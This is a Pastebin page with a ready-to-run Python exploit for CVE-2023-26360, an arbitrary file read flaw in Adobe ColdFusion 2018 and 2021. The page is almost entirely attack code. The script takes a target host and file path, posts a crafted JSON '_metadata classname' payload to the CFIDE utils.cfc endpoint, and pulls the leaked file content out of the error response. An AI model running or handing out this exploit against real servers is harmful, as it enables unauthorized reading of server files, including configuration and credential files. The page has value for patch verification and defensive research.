Advertisement
FlyFar

Adobe ColdFusion versions 2018,15 and 2021,5 and earlier - Arbitrary File Read - CVE-2023-26360

Mar 12th, 2024
585
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.92 KB | Cybersecurity | 0 0
  1. # Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360
  2. # Google Dork: [not]
  3. # Date: [12/28/2023]
  4. # Exploit Author: [Youssef Muhammad]
  5. # Vendor Homepage: [
  6. https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]
  7. # Software Link: [
  8. https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]
  9. # Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and
  10. earlier]
  11. # Tested on: [Windows, Linux]
  12. # CVE : [CVE-2023-26360]
  13.  
  14. import sys
  15. import requests
  16. import json
  17.  
  18. BANNER = """
  19.   ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████   ██████  ██████   ██████   ██████  
  20.  ██      ██    ██ ██                 ██ ██  ████      ██      ██            ██ ██            ██ ██       ██  ████
  21.  ██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████  ███████   █████  ███████  ██ ██ ██
  22.  ██       ██  ██  ██            ██      ████  ██ ██           ██       ██      ██    ██      ██ ██    ██ ████  ██
  23.   ██████   ████   ███████       ███████  ██████  ███████ ██████        ███████  ██████  ██████   ██████   ██████                                                                                                                                                                                                                                      
  24. """
  25.  
  26. RED_COLOR = "\033[91m"
  27. GREEN_COLOR = "\032[42m"
  28. RESET_COLOR = "\033[0m"
  29.  
  30. def print_banner():
  31.     print(RED_COLOR + BANNER + "                  Developed by SecureLayer7" + RESET_COLOR)
  32.     return 0
  33.  
  34. def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):
  35.     if not endpoint.endswith('.cfc'):
  36.         endpoint += '.cfc'
  37.  
  38.     if target_file.endswith('.cfc'):
  39.         raise ValueError('The TARGET_FILE must not point to a .cfc')
  40.  
  41.     targeted_file = f"a/{target_file}"
  42.     json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})
  43.  
  44.     vars_get = {'method': 'test', '_cfclient': 'true'}
  45.     uri = f'{host}{endpoint}'
  46.  
  47.     response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)
  48.  
  49.     file_data = None
  50.     splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>'
  51.  
  52.     if response.status_code in [404, 500] and splatter in response.text:
  53.         file_data = response.text.split(splatter, 1)[0]
  54.  
  55.     if file_data is None:
  56.         raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')
  57.  
  58.     print(file_data)
  59.  
  60.     # Save the output to a file
  61.     output_file_name = 'output.txt'
  62.     with open(output_file_name, 'w') as output_file:
  63.         output_file.write(file_data)
  64.         print(f"The output saved to {output_file_name}")
  65.  
  66. if __name__ == "__main__":
  67.     if not 3 <= len(sys.argv) <= 5:
  68.         print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")
  69.         sys.exit(1)
  70.  
  71.     print_banner()
  72.  
  73.     host = sys.argv[1]
  74.     target_file = sys.argv[2]
  75.     endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"
  76.     proxy_url = sys.argv[4] if len(sys.argv) > 4 else None
  77.  
  78.     try:
  79.         run_exploit(host, target_file, endpoint, proxy_url)
  80.     except Exception as e:
  81.         print(f"Error: {e}")
  82.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement